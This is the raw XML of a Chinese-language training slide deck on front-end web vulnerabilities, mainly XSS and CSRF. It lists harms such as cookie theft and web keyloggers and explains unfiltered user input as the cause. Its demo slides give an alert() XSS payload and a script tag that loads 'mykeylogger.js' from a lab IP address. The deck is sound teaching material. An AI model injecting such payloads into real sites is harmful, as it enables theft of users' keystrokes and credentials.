              <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="284360"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4"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不可小觑的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN"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 WEB </a:t>
              </a:r>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前端安全漏洞</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="207532" y="454200"/>
              <a:ext cx="213311" cy="81492"/>
              <a:chOff x="207532" y="454200"/>
              <a:chExt cx="213311" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="6"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7"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8" name="组合 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1123569" y="454200"/>
              <a:ext cx="213302" cy="81492"/>
              <a:chOff x="1123569" y="454200"/>
              <a:chExt cx="213302" cy="81492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="9"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10"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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="270427" y="1038978"/>
            <a:ext cx="3403600" cy="4318000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964429" y="1038978"/>
            <a:ext cx="3465436" cy="4338511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865136" y="918020"/>
            <a:ext cx="3561804" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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1</a:t>
            </a:r>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XSS</a:t>
            </a:r>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（跨站脚本攻击）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7780790" y="1419026"/>
            <a:ext cx="4411210" cy="1338828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865136" y="3349430"/>
            <a:ext cx="4214188" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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2</a:t>
            </a:r>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CSRF</a:t>
            </a:r>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（跨站请求伪造）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3947600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738664"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="306009" y="1600540"/>
            <a:ext cx="7485714" cy="4352381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3404922" y="1403876"/>
            <a:ext cx="7204862" cy="3348838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1610723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015663"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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绝不仅仅是能弹窗。</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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="1124765"/>
            <a:ext cx="4382635" cy="4662815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>挂马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>盗取用户</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>键盘记录器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>客户端浏览器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>钓鱼攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编写针对性的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>病毒，删除目标数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>行为，进一步渗透内网</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>爆发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>web2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>蠕虫式的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>蠕虫式挂马、刷广告、刷流量</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="is-IS" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="微信出现“远程弹窗漏洞”，已刷爆朋友圈（内附具体玩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067" y="1029340"/>
            <a:ext cx="3879120" cy="437187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5628067" y="1197713"/>
            <a:ext cx="6257143" cy="657143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5525037" y="2360574"/>
            <a:ext cx="6243918" cy="3040639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2328030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015663"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞案例演示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="841308"/>
            <a:ext cx="6438095" cy="2238095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="2860462"/>
            <a:ext cx="6219048" cy="828571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014345" y="3857498"/>
            <a:ext cx="7742857" cy="2685714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7689274" y="1854430"/>
            <a:ext cx="4081548" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户输入内容没有进行任何过滤或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编码操作，之后又将该内容输出到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>标签中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269533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015663"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>漏洞案例演示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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在输入框中输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以看到弹窗。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1158012" y="1452258"/>
            <a:ext cx="8828571" cy="3438095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238595" y="5311833"/>
            <a:ext cx="9077499" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这意味着攻击者，可以在页面中嵌入任意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239611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738664"/>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键盘记录器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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在输入框中输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>=“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>192.168.50.167:8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Testxss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>/mykeylogger.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>"&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081320" y="1349140"/>
            <a:ext cx="6504762" cy="2561905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
